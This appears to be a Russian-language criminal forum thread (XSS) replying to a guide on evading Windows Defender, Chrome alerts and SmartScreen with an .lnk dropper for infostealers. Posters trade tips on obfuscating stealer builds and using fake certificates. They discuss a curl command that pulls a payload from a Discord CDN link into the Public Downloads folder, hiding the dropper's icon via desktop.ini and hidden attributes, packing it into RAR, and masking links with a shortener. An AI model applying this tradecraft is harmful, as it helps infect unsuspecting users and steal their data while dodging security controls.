• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Не плати за крипт или гайд по обходу Виндефа, Хромалерта и Смартскрина For Free + Ink Dropper

Про темиду я сказал чисто из уважения к создателям стилеров, друг, ибо переписывать стаб каждые 2 недели из-за челов, которым лень обфусцировать билд - не особо благодарное дело. Именно поэтому тот же редлайн запрещает лить билд в чистом виде.
обфускация не какой роли не сыграет в анализе антивируса разве что немного собьёт статичиский детект, в динамике по проверяется совершенно по другому, ровным счётом большой роли, и не сыграют протекторы в виде темиды, энигмы, вмп, и чем там ещё школьники пакуют свои "стилаки"

по поводу "запрещает лить" вообще идеотизм зачем тогда вообще по выпускать в продажу на массу
 
Но .scr это бред конечно, только добавить детекта, по части .msi было пару лет назад все.



Также лепили fake серт и в бой Посмотреть вложение 37078


Проще всего это делать так и.т.д

Не мог бы дать доступ к твоему форуму? Интересно стало почитать статьи. Хотя бы на время =)
 
Не мог бы дать доступ к твоему форуму? Интересно стало почитать статьи. Хотя бы на время =)
Сканировать на вт архивы это конечно нужно быть гением 🤣
 
Единственное что хотелось бы дополнить, вместо имени пользователя в пути, нужно ставить константу
cd C:\Users\Public\Downloads
У человека может пользователь называться не Public, то есть например на моём пк твоя штука не сработает, путь должен быть такой:
cd C:\Users\%USERNAME%\Downloads
Тогда работать будет на любом пк
curl -o 1.txt https://cdn.discordapp.com/attachments/922584606400741378/924391503042871297/123.txt - Эта команда отвечает за скачивание самого файла ( не стал сокращать, но вам советую) Аргумент -о отвечает за то, под каким именем сохранится файл, который будет скачан по ссылке, далее идёт сама ссылка на прямое скачивание файла.
Вот эта команда у меня не работает
1657268363918.png

Скорее всего нужно открывать через терминал какое то приложение, а потом уже открывать, хз) У тебя по крайней мере написано что она работает напрямую из терминала
 
Единственное что хотелось бы дополнить, вместо имени пользователя в пути, нужно ставить константу

У человека может пользователь называться не Public, то есть например на моём пк твоя штука не сработает, путь должен быть такой:
cd C:\Users\%USERNAME%\Downloads
Тогда работать будет на любом пк

Вот эта команда у меня не работает
Посмотреть вложение 39033
Скорее всего нужно открывать через терминал какое то приложение, а потом уже открывать, хз) У тебя по крайней мере написано что она работает напрямую из терминала
Не совсем так, дружище. Помимо папок с локальными учётками есть ещё папка Общие, она же Public.
А курл встроено во все вин, начиная от 10 версии )
 
Не совсем так, дружище. Помимо папок с локальными учётками есть ещё папка Общие, она же Public.
А курл встроено во все вин, начиная от 10 версии )
Ну так загрузки находятся не в общих, а в загрузках конкретного юзера, если мне не изменяет память.
Про curl спасибо, буду знать)
 
Ну так загрузки находятся не в общих, а в загрузках конкретного юзера, если мне не изменяет память.
Про curl спасибо, буду знать)
Там так же есть папка "общие загрузки" Если это она конечно)
 
Ну так загрузки находятся не в общих, а в загрузках конкретного юзера, если мне не изменяет память.
Про curl спасибо, буду знать)
просто попробуй найти у себя на машине эту папку, друг
C:\Users\Public\Downloads
 
После того как пользователь скачает такой файл - иконка у него не отобразится. Если мне не изменяет память, иконку нужно прописать в файле desktop.ini:
Код:
[.ShellClassInfo]
IconResource=filename.ico,0
все это складывается в одну папку и затем для desktop.ini и filename.ico нужно проставить атрибуты «скрытый», через attrib или свойства файла.
Затем папка пакуется в rar и тд.
Как это сделать? Ни гугл, ни ютуб не помогли, Resource Hack тоже (((
 
Как это сделать? Ни гугл, ни ютуб не помогли, Resource Hack тоже (((
 
Как это сделать? Ни гугл, ни ютуб не помогли, Resource Hack тоже (((
На всякий случай привожу список встроенных библиотек Windows 10, где хранятся основные иконки системы (все находятся в C:\Windows\System32)
  • shell32.dll (выбран по умолчанию при смене значка).
  • imageres.dll
  • ddores.dll
Рекомендую использовать стоковые библиотеки вин, бро. Там есть всё, что нужно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Красиво? Ещё неочень, дальше мы идём на лучший сократитель ссылок gg.gg
Ссылки с gg.gg можно снести
 
Пожалуйста, обратите внимание, что пользователь заблокирован
да это все как пример показали, как основы, дальше же все своё юзать будут, а не с мануала :)
Ну есть друрочки что будут и так предупреждаю о приколах
 
очень годная инфа, сам заинтересовался данными фишками, только почему то curl не хочет работать :( хотя тест производится на вин серв 2016
на WS курла по умолчанию нет, насколько я знаю, бро. Он совершенно точно есть на w10 , так что с этим проблем быть не должно. Если не хочешь стилировать свой собственный пк, то вместо ехе просто пихни туда любой текстовик или напиши мне в лс\тг за примером
 
на WS курла по умолчанию нет, насколько я знаю, бро. Он совершенно точно есть на w10 , так что с этим проблем быть не должно. Если не хочешь стилировать свой собственный пк, то вместо ехе просто пихни туда любой текстовик или напиши мне в лс\тг за примером

да, вчера на вин10 протестил - ворк, как я понял на вин серв такая особенность с курлом :)
 
да, вчера на вин10 протестил - ворк, как я понял на вин серв такая особенность с курлом :)
не только на ws, он есть на 8 (вроде) и 10 (точно). На 11 хз, не тестил)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх